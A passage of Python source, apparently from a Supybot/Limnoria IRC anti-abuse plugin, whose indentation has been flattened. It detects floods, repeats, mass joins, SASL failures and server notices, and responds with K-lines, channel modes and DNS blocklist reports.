i = self.getIrc(irc)
if len(self.registryValue('lethalChannels')) > 0:
for pattern in self.registryValue('lethalChannels'):
if len(pattern) and pattern in channel and not user in channel and not user in i.tokline:
i.toklineresults[user] = {}
i.toklineresults[user]['kind'] = 'lethal'
i.tokline[user] = text
self.log.info('WHOIS %s (%s)' % (user,channel))
irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (user,user)))
break
def handleClient (self,irc,text):
i = self.getIrc(irc)
#if i.defcon:
def doNotice (self,irc,msg):
(targets, text) = msg.args
if len(targets) and targets[0] == '*':
# server notices
text = text.replace('\x02','')
if text.startswith('*** Notice -- '):
text = text.replace('*** Notice -- ','')
if text.startswith('Client connecting'):
if 'gateway/vpn/privateinternetaccess' in text:
account = text.split('(')[1].split(')')[0]
account = account.split('@gateway/vpn/privateinternetaccess/')[1].split('/')[0]
#self.log.info('connecting %s' % account)
q = self.getIrcQueueFor(irc,account,'nsregister',600)
if len(q) == 1:
self.logChannel(irc,"SERVICE: fresh account %s moved to pia" % account)
if text.startswith('Possible Flooder '):
self.handleFloodSnote(irc,text)
#elif text.find('is creating new channel') != -1:
# self.handleChannelCreation(irc,text)
elif text.startswith('Nick change: From'):
self.handleNickSnote(irc,text)
elif text.startswith('User') and text.endswith('is a possible spambot'):
self.handleJoinSnote(irc,text)
elif 'failed login attempts to' in text and not 'SASL' in text:
self.handleIdSnote(irc,text)
elif text.startswith('Too many clients, rejecting ') or text.startswith('All connections in use.') or text.startswith('creating SSL/TLS socket pairs: 24 (Too many open files)'):
i = self.getIrc(irc)
if not msg.prefix in i.limits or time.time() - i.limits[msg.prefix] > self.registryValue('alertPeriod'):
i.limits[msg.prefix] = time.time()
self.logChannel(irc,'INFRA: %s is rejecting clients' % msg.prefix.split('.')[0])
if not i.netsplit:
self.logChannel(irc,'INFO: netsplit activated for %ss : some abuses are ignored' % self.registryValue('netsplitDuration'))
i.netsplit = time.time() + self.registryValue('netsplitDuration')
elif text.startswith('KLINE active') or text.startswith('K/DLINE active'):
self.handleKline(irc,text)
elif text.find('due to too high load') != -1:
i = self.getIrc(irc)
if not 'services.' in i.limits:
i.limits['services.'] = time.time()
reason = text.split("type '")[1]
reason = reason.split(' ')[0]
                        self.logChannel(irc,"INFRA: High load on services ('%s')" % reason)
def rct():
i = self.getIrc(irc)
if 'services.' in i.limits:
del i.limits['services.']
schedule.addEvent(rct,time.time()+self.registryValue('alertPeriod'))
elif 'K-Line for [*@' in text:
oper = text.split(' ')[0]
i = self.getIrc(irc)
i.lastKlineOper = oper
reason = text.split('K-Line for [*@')[1]
reason = reason.split(']')[1].replace('[','').replace(']','')
hasPattern = False
for p in self.registryValue('droneblPatterns'):
if p in reason:
hasPattern = p
break
ip = text.split('K-Line for [*@')[1].split(']')[0]
permit = self.registryValue('ipv4AbusePermit')
if not 'evilmquin' in oper and permit > -1:
ranges = self._ip_ranges(ip)
for range in ranges:
q = self.getIrcQueueFor(irc,'klineRange',range,self.registryValue('ipv4AbuseLife'))
q.enqueue(ip)
if len(q) > permit:
hs = []
for m in q:
hs.append(m)
q.reset()
uid = random.randint(0,1000000)
if self.registryValue('useOperServ'):
irc.sendMsg(ircmsgs.IrcMsg('PRIVMSG OperServ :AKILL ADD %s !T %s %s' % (range,self.registryValue('klineDuration'),'%s - repeat abuses on this range (%s/%ss)' % (uid,permit,self.registryValue('ipv4AbuseLife')))))
else:
irc.sendMsg(ircmsgs.IrcMsg('KLINE %s *@%s :%s|%s' % (self.registryValue('klineDuration'),range,self.registryValue('klineMessage'),'%s - repeat abuses on this range (%s/%ss)' % (uid,permit,self.registryValue('ipv4AbuseLife')))))
self.logChannel(irc,"BAD: abuses detected on %s (%s/%ss - %s) %s" % (range,permit,self.registryValue('ipv4AbuseLife'),uid,','.join(hs)))
permit = permit + 1
if '!dnsbl' in text or hasPattern:
reason = ''
if '!dnsbl' in text:
reason = text.split('!dnsbl')[1].replace(']','').strip()
else:
reason = hasPattern
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),reason))
t.setDaemon(True)
t.start()
else:
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.resolve,name=format('resolve %s', '*!*@%s' % ip),args=(irc,'*!*@%s' % ip,'',True, reason))
t.setDaemon(True)
t.start()
else:
self.prefixToMask(irc,'*!*@%s' % ip,'',True,reason)
elif 'failed login attempts to' in text and 'SASL' in text:
self.handleSaslFailure(irc,text)
elif text.startswith('FILTER'):
ip = text.split(' ')[2].split('[')[1].split(']')[0]
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
if not ip in self.ipfiltered:
if self.registryValue('serverFilteringPermit') > -1:
q = self.getIrcQueueFor(irc,'serverSideFiltering',ip,self.registryValue('serverFilteringLife'))
q.enqueue(ip)
reason = 'Server Side Filtering'
if len(q) > self.registryValue('serverFilteringPermit'):
self.ipfiltered[ip] = True
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),reason))
t.setDaemon(True)
t.start()
else:
self.handleMsg(irc,msg,True)
def do215 (self,irc,msg):
i = self.getIrc(irc)
if msg.args[0] == irc.nick and msg.args[1] == 'I':
i.lines[msg.args[4]] = '%s %s %s' % (msg.args[2],msg.args[3],msg.args[5])
# if len(i.dlines):
# h = i.dlines.pop(0)
# self.log.info('DLINE %s|%s' % (h,self.registryValue('saslDuration')))
# irc.sendMsg(ircmsgs.IrcMsg('DLINE %s %s on * :%s' % (self.registryValue('saslDuration'),h,self.registryValue('saslMessage'))))
# if len(i.dlines):
# irc.queueMsg(ircmsgs.IrcMsg('TESTLINE %s' % i.dlines[0]))
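# Tracks repeated SASL login failures per account and per host; offending hosts are queued for D-Lines and
# 'stats I' is requested from the server currently reporting the most users.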
def handleSaslFailure (self,irc,text):
i = self.getIrc(irc)
limit = self.registryValue('saslPermit')
if limit < 0:
return
life = self.registryValue('saslLife')
account = text.split('failed login attempts to ')[1].split('.')[0]
host = text.split('<Unknown user (via SASL):')[1].split('>')[0]
q = self.getIrcQueueFor(irc,'sasl',account,life)
q.enqueue(host)
hosts = {}
if len(q) > limit:
for ip in q:
hosts[ip] = ip
q.reset()
q = self.getIrcQueueFor(irc,'sasl',host,life)
q.enqueue(account)
if len(q) > limit:
q.reset()
hosts[host] = host
if self.registryValue('enable'):
if len(hosts) > 0:
for h in hosts:
if len(i.dlines):
i.dlines.append(h)
else:
i.dlines.append(h)
found = None
users = None
i = self.getIrc(irc)
for server in i.servers:
if not users or users < i.servers[server]:
found = server
users = i.servers[server]
if found:
irc.queueMsg(ircmsgs.IrcMsg('stats I %s' % found))
self.logChannel(irc,'NOTE: %s (%s) (%s/%ss)' % (h,'SASL failures',limit,life))
def warnedOnOtherChannel (self,irc,channel,mask):
for chan in list(irc.state.channels):
if chan != channel:
if self.hasAbuseOnChannel(irc,chan,mask):
return True
return False
def hasAbuseOnChannel (self,irc,channel,key):
chan = self.getChan(irc,channel)
kind = 'abuse'
limit = self.registryValue('%sPermit' % kind,channel=channel)
if kind in chan.buffers:
if key in chan.buffers[kind]:
if len(chan.buffers[kind][key]) > limit:
return True
return False
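# Records an abuse event of the given kind for the channel; past abusePermit the channel is marked as under
# attack (chan.called), ignores are lifted and global defcon is raised.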
def isAbuseOnChannel (self,irc,channel,key,mask):
chan = self.getChan(irc,channel)
kind = 'abuse'
limit = self.registryValue('%sPermit' % kind,channel=channel)
if limit < 0:
return False
life = self.registryValue('%sLife' % kind,channel=channel)
if not kind in chan.buffers:
chan.buffers[kind] = {}
if not key in chan.buffers[kind]:
chan.buffers[kind][key] = utils.structures.TimeoutQueue(life)
elif chan.buffers[kind][key].timeout != life:
chan.buffers[kind][key].setTimeout(life)
found = False
for m in chan.buffers[kind][key]:
if mask == m:
found = True
break
if not found:
chan.buffers[kind][key].enqueue(mask)
i = self.getIrc(irc)
if i.defcon:
limit = limit - 1
if limit < 0:
limit = 0
if len(chan.buffers[kind][key]) > limit:
self.log.debug('abuse in %s : %s : %s/%s' % (channel,key,len(chan.buffers[kind][key]),limit))
# chan.buffers[kind][key].reset()
            # queue deliberately not reset, so that for its whole life it keeps returning True
if not chan.called:
if not i.defcon:
self.logChannel(irc,"INFO: [%s] ignores lifted, limits lowered due to %s abuses for %ss" % (channel,key,self.registryValue('abuseDuration',channel=channel)))
if not i.defcon:
i.defcon = time.time()
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
self.applyDefcon(irc)
chan.called = time.time()
return True
return False
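# Generic per-channel rate limit: enqueues the key in a TimeoutQueue for the given kind and returns a reason
# string once the configured permit is exceeded (thresholds tighten for new users, defcon and ongoing abuse).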
def isBadOnChannel (self,irc,channel,kind,key):
chan = self.getChan(irc,channel)
limit = self.registryValue('%sPermit' % kind,channel=channel)
if limit < 0:
return False
i = self.getIrc(irc)
if i.netsplit:
kinds = ['flood','lowFlood','nick','lowRepeat','lowMassRepeat','broken']
if kind in kinds:
return False
life = self.registryValue('%sLife' % kind,channel=channel)
if limit == 0:
return '%s %s/%ss in %s' % (kind,limit,life,channel)
if not kind in chan.buffers:
chan.buffers[kind] = {}
newUser = False
if not key in chan.buffers[kind]:
newUser = True
chan.buffers[kind][key] = utils.structures.TimeoutQueue(life)
chan.buffers[kind]['%s-creation' % key] = time.time()
elif chan.buffers[kind][key].timeout != life:
chan.buffers[kind][key].setTimeout(life)
ignore = self.registryValue('ignoreDuration',channel=channel)
if ignore > 0:
if time.time() - chan.buffers[kind]['%s-creation' % key] < ignore:
newUser = True
chan.buffers[kind][key].enqueue(key)
if newUser or i.defcon or self.hasAbuseOnChannel(irc,channel,kind) or chan.called:
limit = limit - 1
if limit < 0:
limit = 0
if len(chan.buffers[kind][key]) > limit:
chan.buffers[kind][key].reset()
if not kind == 'broken':
self.isAbuseOnChannel(irc,channel,kind,key)
return '%s %s/%ss in %s' % (kind,limit,life,channel)
return False
def hasBadOnChannel (self,irc,channel,kind,key):
chan = self.getChan(irc,channel)
if not kind in chan.buffers:
return False
if not key in chan.buffers[kind]:
            return False
return len(chan.buffers[kind][key]) > 0
def isChannelUniSpam (self,irc,msg,channel,mask,text):
count = len([char for char in text if char in self.spamchars])
return len(text) < 32 and count >=3
def isChannelCtcp (self,irc,msg,channel,mask,text):
return self.isBadOnChannel(irc,channel,'ctcp',mask)
def isChannelNotice (self,irc,msg,channel,mask,text):
return self.isBadOnChannel(irc,channel,'notice',mask)
def isChannelLowFlood (self,irc,msg,channel,mask,text):
return self.isBadOnChannel(irc,channel,'lowFlood',mask)
def isChannelCap (self,irc,msg,channel,mask,text):
text = text.replace(' ','')
if len(text) == 0 or len(text) > self.registryValue('capMinimum',channel=channel):
limit = self.registryValue('capPermit',channel=channel)
if limit < 0:
return False
trigger = self.registryValue('capPercent',channel=channel)
matchs = self.recaps.findall(text)
#self.log.info ('%s : %s : %s :%s' % (mask,channel,text,len(matchs)))
if len(matchs) and len(text):
percent = (len(matchs)*100) / (len(text) * 1.0)
#self.log.info ('%s: %s/%s %s' % (mask,percent,trigger,text))
if percent >= trigger:
return self.isBadOnChannel(irc,channel,'cap',mask)
return False
def isChannelFlood (self,irc,msg,channel,mask,text):
if len(text) == 0 or len(text) >= self.registryValue('floodMinimum',channel=channel) or text.isdigit():
return self.isBadOnChannel(irc,channel,'flood',mask)
return False
def isChannelHilight (self,irc,msg,channel,mask,text):
return self.isHilight(irc,msg,channel,mask,text,False)
def isChannelLowHilight (self,irc,msg,channel,mask,text):
return self.isHilight(irc,msg,channel,mask,text,True)
def isChannelUnicode (self,irc,msg,channel,mask,text):
limit = self.registryValue('badunicodeLimit',channel=channel)
if limit > 0:
score = sequence_weirdness(u'%s' % text)
count = self.registryValue('badunicodeScore',channel=channel)
if count < score:
return self.isBadOnChannel(irc,channel,'badunicode',mask)
return False
def isHilight (self,irc,msg,channel,mask,text,low):
kind = 'hilight'
if low:
kind = 'lowHilight'
limit = self.registryValue('%sNick' % kind,channel=channel)
if limit < 0:
return False
count = 0
users = []
if channel in irc.state.channels and irc.isChannel(channel):
for u in list(irc.state.channels[channel].users):
if u == 'ChanServ' or u == msg.nick:
continue
users.append(u.lower())
flag = False
us = {}
for user in users:
if len(user) > 3:
if not user in us and user in text:
us[user] = True
count = count + 1
if count > limit:
flag = True
break
result = False
if flag:
result = self.isBadOnChannel(irc,channel,kind,mask)
return result
def isChannelRepeat (self,irc,msg,channel,mask,text):
return self.isRepeat(irc,msg,channel,mask,text,False)
def isChannelLowRepeat (self,irc,msg,channel,mask,text):
return self.isRepeat(irc,msg,channel,mask,text,True)
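# Repeat detection: compares the message with the sender's recent lines and, when similarity exceeds the
# configured percentage, extracts a repeated substring as a temporary channel pattern (optionally shared).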
def isRepeat(self,irc,msg,channel,mask,text,low):
kind = 'repeat'
key = mask
if low:
kind = 'lowRepeat'
key = 'low_repeat %s' % mask
limit = self.registryValue('%sPermit' % kind,channel=channel)
if limit < 0:
return False
if len(text) < self.registryValue('%sMinimum' % kind,channel=channel):
return False
chan = self.getChan(irc,channel)
life = self.registryValue('%sLife' % kind,channel=channel)
trigger = self.registryValue('%sPercent' % kind,channel=channel)
if not key in chan.logs:
chan.logs[key] = utils.structures.TimeoutQueue(life)
elif chan.logs[key].timeout != life:
chan.logs[key].setTimeout(life)
logs = chan.logs[key]
flag = False
result = False
for m in logs:
if compareString(m,text) > trigger:
flag = True
break
if flag:
result = self.isBadOnChannel(irc,channel,kind,mask)
enough = False
i = self.getIrc(irc)
if flag and not i.netsplit:
if kind in chan.buffers and key in chan.buffers[kind]:
                # start trying to build a pattern once the user has filled a bit over half (55%) of their buffer
if len(chan.buffers[kind][key])/(limit * 1.0) > 0.55:
enough = True
if result or enough:
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
if self.registryValue('computedPattern',channel=channel) > -1 and len(text) > self.registryValue('computedPattern',channel=channel):
repeats = []
if low:
pat = ''
for m in logs:
if compareString(m,text) > trigger:
p = largestString(m,text)
if len(p) > self.registryValue('computedPattern',channel=channel):
if len(p) > len(pat):
pat = p
if len(pat):
repeats = [(pat,1)]
else:
repeats = list(repetitions(text))
candidate = ''
patterns = {}
for repeat in repeats:
(p,c) = repeat
#self.log.debug('%s :: %s' % (p,c))
if len(p) < self.registryValue('%sMinimum' % kind, channel=channel):
continue
p = p.strip()
if p in patterns:
patterns[p] += c
else:
patterns[p] = c
if len(p) > self.registryValue('computedPattern',channel=channel):
if len(p) > len(candidate):
candidate = p
elif len(p) * c > self.registryValue('computedPattern',channel=channel):
tentative = ''.join(list((p,) * int(c)))
if not tentative in text:
tentative = ''.join(list(((p + ' '),) * int(c)))
if not tentative in text:
tentative = ''
if len(tentative):
tentative = tentative[:self.registryValue('computedPattern',channel=channel)]
if len(tentative) > len(candidate):
candidate = tentative
elif patterns[p] > self.registryValue('%sCount' % kind,channel=channel):
if len(p) > len(candidate):
candidate = p
if candidate.strip() == channel:
                    self.log.debug('pattern candidate %s discarded in %s' % (candidate,channel))
candidate = ''
if len(candidate) and len(candidate) > self.registryValue('%sMinimum' % kind, channel=channel):
found = False
for p in chan.patterns:
if p in candidate:
found = True
break
if not found:
candidate = candidate.strip()
shareID = self.registryValue('shareComputedPatternID',channel=channel)
i = self.getIrc(irc)
if shareID != -1 or i.defcon:
nb = 0
for chan in i.channels:
ch = i.channels[chan]
life = self.registryValue('computedPatternLife',channel=chan)
if shareID != self.registryValue('shareComputedPatternID',channel=chan):
continue
if not ch.patterns:
ch.patterns = utils.structures.TimeoutQueue(life)
elif ch.patterns.timeout != life:
ch.patterns.setTimeout(life)
ch.patterns.enqueue(candidate)
nb = nb + 1
self.logChannel(irc,'PATTERN: [%s] %s added "%s" in %s channels (%s)' % (channel,mask,candidate,nb,kind))
else:
chan.patterns.enqueue(candidate)
self.logChannel(irc,'PATTERN: [%s] %s added "%s" for %ss (%s)' % (channel,mask,candidate,self.registryValue('computedPatternLife',channel=channel),kind))
logs.enqueue(text)
return result
def isChannelMassRepeat (self,irc,msg,channel,mask,text):
return self.isMassRepeat(irc,msg,channel,mask,text,False)
def isChannelLowMassRepeat (self,irc,msg,channel,mask,text):
return self.isMassRepeat(irc,msg,channel,mask,text,True)
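# Mass-repeat detection: like isRepeat but compares against the channel's recent lines as a whole and
# extracts the largest common substring as a temporary pattern.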
def isMassRepeat (self,irc,msg,channel,mask,text,low):
kind = 'massRepeat'
key = 'mass Repeat'
if low:
kind = 'lowMassRepeat'
key = 'low mass Repeat'
limit = self.registryValue('%sPermit' % kind,channel=channel)
if limit < 0:
return False
if len(text) < self.registryValue('%sMinimum' % kind,channel=channel):
return False
chan = self.getChan(irc,channel)
life = self.registryValue('%sLife' % kind,channel=channel)
trigger = self.registryValue('%sPercent' % kind,channel=channel)
length = self.registryValue('computedPattern',channel=channel)
if not key in chan.logs:
chan.logs[key] = utils.structures.TimeoutQueue(life)
elif chan.logs[key].timeout != life:
chan.logs[key].setTimeout(life)
flag = False
result = False
pattern = None
s = ''
logs = chan.logs[key]
for m in logs:
found = compareString(m,text)
if found > trigger:
if length > 0:
pattern = largestString(m,text)
if len(pattern) < length:
pattern = None
else:
s = s.strip()
if len(s) > len(pattern):
pattern = s
s = pattern
flag = True
break
if flag:
result = self.isBadOnChannel(irc,channel,kind,channel)
if result and pattern and length > -1:
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
if len(pattern) > length:
pattern = pattern[:-1]
found = False
for p in chan.patterns:
if p in pattern:
found = True
break
if not found:
shareID = self.registryValue('shareComputedPatternID',channel=channel)
if shareID != -1:
nb = 0
i = self.getIrc(irc)
for chan in i.channels:
ch = i.channels[chan]
if shareID != self.registryValue('shareComputedPatternID',channel=chan):
continue
life = self.registryValue('computedPatternLife',channel=chan)
if not ch.patterns:
ch.patterns = utils.structures.TimeoutQueue(life)
elif ch.patterns.timeout != life:
ch.patterns.setTimeout(life)
ch.patterns.enqueue(pattern)
nb = nb + 1
self.logChannel(irc,'PATTERN: [%s] %s added "%s" in %s channels (%s)' % (channel,mask,pattern,nb,kind))
else:
chan.patterns.enqueue(pattern)
self.logChannel(irc,'PATTERN: [%s] %s added "%s" for %ss (%s)' % (channel,mask,pattern,self.registryValue('computedPatternLife',channel=channel),kind))
logs.enqueue(text)
if result and pattern:
return result
return False
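# Reports a message to the configured log channel with throttling; sustained alert floods raise defcon and
# re-apply the $~a quiets on defconMode channels.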
def logChannel(self,irc,message):
channel = self.registryValue('logChannel')
i = self.getIrc(irc)
if channel in irc.state.channels:
self.log.info('logChannel : %s' % message)
msg = ircmsgs.privmsg(channel,message)
if self.registryValue('useNotice'):
msg = ircmsgs.notice(channel,message)
life = self.registryValue('announceLife')
limit = self.registryValue('announcePermit')
if limit > -1:
q = self.getIrcQueueFor(irc,'status','announce',life)
q.enqueue(message)
if len(q) > limit:
if not i.throttled:
i.throttled = True
irc.queueMsg(ircmsgs.privmsg(channel,'NOTE: messages throttled to avoid spam for %ss' % life))
if not i.defcon:
                            self.logChannel(irc,"INFO: ignores lifted and abuses lead to klines for %ss due to abuses" % self.registryValue('defcon'))
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
for channel in irc.state.channels:
if irc.isChannel(channel) and self.registryValue('defconMode',channel=channel):
if not 'z' in irc.state.channels[channel].modes:
if irc.nick in list(irc.state.channels[channel].ops):
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +qz $~a' % channel))
else:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +oqz %s $~a' % (channel,irc.nick)))
i.defcon = time.time()
else:
i.throttled = False
if i.opered:
irc.sendMsg(msg)
else:
irc.queueMsg(msg)
else:
if i.opered:
irc.sendMsg(msg)
else:
irc.queueMsg(msg)
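# JOIN handler: records join time/prefix/mask/gecos/account per nick, enforces lethal accounts seen via
# extended-join, and applies massJoin / massJoinHost detection.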
def doJoin (self,irc,msg):
if irc.prefix == msg.prefix:
i = self.getIrc(irc)
return
channels = msg.args[0].split(',')
if not ircutils.isUserHostmask(msg.prefix):
return
if ircdb.checkCapability(msg.prefix, 'protected'):
return
i = self.getIrc(irc)
prefix = msg.prefix
gecos = None
account = None
if len(msg.args) == 3:
gecos = msg.args[2]
account = msg.args[1]
if account == '*':
account = None
else:
aa = account.lower()
for u in i.klinednicks:
if aa == u:
self.logChannel(irc,"SERVICE: %s (%s) lethaled account (extended-join %s)" % (msg.prefix,account,msg.args[0]))
src = msg.nick
i.klinednicks.enqueue(aa)
if not src in i.tokline:
i.toklineresults[src] = {}
i.toklineresults[src]['kind'] = 'evade'
i.tokline[src] = src
def f ():
irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
schedule.addEvent(f,time.time()+random.randint(0,7))
#irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
break
for channel in channels:
if ircutils.isChannel(channel) and channel in irc.state.channels:
if self.registryValue('ignoreChannel',channel):
continue
chan = self.getChan(irc,channel)
t = time.time()
mask = self.prefixToMask(irc,msg.prefix,channel)
if isCloaked(msg.prefix,self) or account:
t = t - self.registryValue('ignoreDuration',channel=channel) - 1
chan.nicks[msg.nick] = [t,msg.prefix,mask,gecos,account]
if self.registryValue('ignoreRegisteredUser',channel=channel):
if account:
continue
if i.netsplit:
continue
if 'gateway/shell/matrix.org' in msg.prefix:
continue
life = self.registryValue('massJoinLife',channel=channel)
limit = self.registryValue('massJoinPermit',channel=channel)
trigger = self.registryValue('massJoinPercent',channel=channel)
length = self.registryValue('massJoinMinimum',channel=channel)
# massJoin for the whole channel
flags = []
if limit > -1:
b = self.isBadOnChannel(irc,channel,'massJoin',channel)
if b:
self.log.info('Massjoin detected in %s (%s/%s)' % (channel,life,limit))
life = self.registryValue('massJoinHostLife',channel=channel)
limit = self.registryValue('massJoinHostPermit',channel=channel)
## massJoin same ip/host
if limit > -1:
b = self.isBadOnChannel(irc,channel,'massJoinHost',mask)
if b:
if not mask in flags:
flags.append(mask)
# self.logChannel(irc,'NOTE: [%s] %s (%s)' % (channel,b,mask))
# life = self.registryValue('massJoinNickLife',channel=channel)
# limit = self.registryValue('massJoinNickPermit',channel=channel)
## massJoin similar nicks
# if limit > -1:
# key = 'massJoinNick'
# if not key in chan.logs:
# chan.logs[key] = utils.structures.TimeoutQueue(life)
# elif chan.logs[key].timeout != life:
# chan.logs[key].setTimeout(life)
# logs = chan.logs[key]
# flag = False
# pattern = ''
# for m in logs:
# if compareString(m,msg.nick) > trigger:
# flag = True
# p = largestString(m,msg.nick)
# if len(p) > len(pattern):
# pattern = p
# if flag and len(pattern) > length and not 'Guest' in pattern:
# b = self.isBadOnChannel(irc,channel,key,pattern)
# if b:
# if not mask in flags:
# flags.append(mask)
# self.logChannel(irc,'NOTE: [%s] %s (%s)' % (channel,b,pattern))
# logs.enqueue(msg.nick)
## massJoin similar gecos
# life = self.registryValue('massJoinGecosLife',channel=channel)
# limit = self.registryValue('massJoinGecosPermit',channel=channel)
# if limit > -1:
# key = 'massJoinGecos'
# if not key in chan.logs:
# chan.logs[key] = utils.structures.TimeoutQueue(life)
# elif chan.logs[key].timeout != life:
# chan.logs[key].setTimeout(life)
# logs = chan.logs[key]
# flag = False
# pattern = ''
# for m in logs:
# if compareString(m,gecos) > trigger:
# flag = True
# p = largestString(m,gecos)
# if len(p) > len(pattern):
# pattern = p
# if flag and len(pattern) > length:
# b = self.isBadOnChannel(irc,channel,key,pattern)
# if b:
# if not mask in flags:
# flags.append(mask)
# self.logChannel(irc,'NOTE: [%s] %s (%s)' % (channel,b,pattern))
# logs.enqueue(gecos)
if self.hasAbuseOnChannel(irc,channel,'cycle') and self.hasAbuseOnChannel(irc,channel,'massJoinHost') and len(flags) > 0 and self.registryValue('massJoinTakeAction',channel=channel):
for u in flags:
if not u in i.klines:
self.kill(irc,msg.nick,self.registryValue('killMessage',channel=channel))
uid = random.randint(0,1000000)
self.kline(irc,msg.prefix,u,self.registryValue('klineDuration'),'%s - cycle/massJoinHost %s !dnsbl' % (uid,channel))
self.logChannel(irc,'BAD: [%s] %s (cycle/massJoinHost %s - %s)' % (channel,u,msg.prefix,uid))
def doPart (self,irc,msg):
channels = msg.args[0].split(',')
i = self.getIrc(irc)
reason = ''
if len(msg.args) == 2:
reason = msg.args[1].lstrip().rstrip()
if not ircutils.isUserHostmask(msg.prefix):
return
if msg.prefix == irc.prefix:
for channel in channels:
if ircutils.isChannel(channel):
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
self.logChannel(irc,'PART: [%s] %s' % (channel,reason))
if channel in i.channels:
del i.channels[channel]
return
mask = self.prefixToMask(irc,msg.prefix)
isBanned = False
reason = ''
if len(msg.args) == 2:
reason = msg.args[1].lstrip().rstrip()
for channel in channels:
if ircutils.isChannel(channel) and channel in irc.state.channels and not isBanned:
chan = self.getChan(irc,channel)
if msg.nick in chan.nicks:
if self.registryValue('ignoreChannel',channel):
continue
if self.registryValue('ignoreRegisteredUser',channel=channel):
if len(chan.nicks[msg.nick]) > 4:
if chan.nicks[msg.nick][4]:
continue
protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(msg.prefix, protected):
continue
if reason == 'Changing Host' or i.netsplit:
continue
bad = False
if len(reason) and 'Kicked by @appservice-irc:matrix.org' in reason:
continue
flag = ircdb.makeChannelCapability(channel, 'cycle')
if ircdb.checkCapability(msg.prefix, flag):
bad = self.isBadOnChannel(irc,channel,'cycle',mask)
if bad:
self.isAbuseOnChannel(irc,channel,'cycle',mask)
if bad:
isBanned = True
uid = random.randint(0,1000000)
log = "BAD: [%s] %s (join/part - %s)" % (channel,msg.prefix,uid)
comment = '%s - join/part flood in %s' % (uid,channel)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),comment,self.registryValue('klineMessage'),log)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
if len(reason):
if 'Kicked by @appservice-irc:matrix.org' in reason or 'requested by' in reason:
continue
bad = self.isChannelMassRepeat(irc,msg,channel,mask,reason)
if bad:
# todo, needs to see more on that one to avoid false positive
#self.kill(irc,msg.nick,msg.prefix)
#self.kline(irc,msg.prefix,mask,self.registryValue('klineDuration'),'%s in %s' % (bad,channel))
self.logChannel(irc,"IGNORED: [%s] %s (Part's message %s) : %s" % (channel,msg.prefix,bad,reason))
if not isBanned:
life = self.registryValue('cycleLife',channel=channel)
if self.hasAbuseOnChannel(irc,channel,'cycle') and time.time() - chan.nicks[msg.nick][0] < life:
isBanned = True
uid = random.randint(0,1000000)
log = "BAD: [%s] %s (cycle abuse - %s)" % (channel,msg.prefix,uid)
comment = '%s - cycle abuse in %s' % (uid,channel)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),comment,self.registryValue('klineMessage'),log)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
flag = ircdb.makeChannelCapability(channel, 'joinSpamPart')
if ircdb.checkCapability(msg.prefix, flag) and not isBanned:
limit = self.registryValue('joinSpamPartPermit',channel=channel)
if limit > -1:
kind = 'joinSpamPart'
life = self.registryValue('joinSpamPartLife',channel=channel)
key = mask
if kind in chan.buffers and key in chan.buffers[kind] and len(chan.buffers[kind][key]) == limit and msg.nick in chan.nicks and time.time() - chan.nicks[msg.nick][0] < life:
self.isAbuseOnChannel(irc,channel,'joinSpamPart',mask)
if self.hasAbuseOnChannel(irc,channel,'joinSpamPart'):
uid = random.randint(0,1000000)
reason = '(%s/%ss joinSpamPart)' % (limit,life)
klinereason = '%s - %s' % (uid,reason)
if i.defcon:
klinereason = '%s !dnsbl' % reason
self.kline(irc,msg.prefix,mask,self.registryValue('klineDuration'),klinereason)
self.logChannel(irc,'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,reason,uid))
isBanned = True
chan.buffers[kind][key].reset()
continue
def doKick (self,irc,msg):
channel = target = reason = None
if len(msg.args) == 3:
(channel,target,reason) = msg.args
else:
(channel,target) = msg.args
reason = ''
i = self.getIrc(irc)
if target == irc.nick:
if channel in i.channels:
self.setRegistryValue('lastActionTaken',-1.0,channel=channel)
self.logChannel(irc,'PART: [%s] %s (kicked)' % (channel,reason))
del i.channels[channel]
try:
network = conf.supybot.networks.get(irc.network)
network.channels().remove(channel)
except KeyError:
pass
def doQuit (self,irc,msg):
if msg.prefix == irc.prefix:
return
reason = ''
if len(msg.args) == 1:
reason = msg.args[0].lstrip().rstrip()
i = self.getIrc(irc)
if reason == '*.net *.split':
if not i.netsplit:
self.logChannel(irc,'INFO: netsplit activated for %ss : some abuses are ignored' % self.registryValue('netsplitDuration'))
i.netsplit = time.time() + self.registryValue('netsplitDuration')
if i.netsplit:
return
mask = self.prefixToMask(irc,msg.prefix)
isBanned = False
(nick,ident,host) = ircutils.splitHostmask(msg.prefix)
for channel in irc.state.channels:
if ircutils.isChannel(channel) and not i.netsplit:
chan = self.getChan(irc,channel)
if self.registryValue('ignoreChannel',channel):
continue
if msg.nick in chan.nicks:
if self.registryValue('ignoreRegisteredUser',channel=channel):
if len(chan.nicks[msg.nick]) > 4:
if chan.nicks[msg.nick][4]:
continue
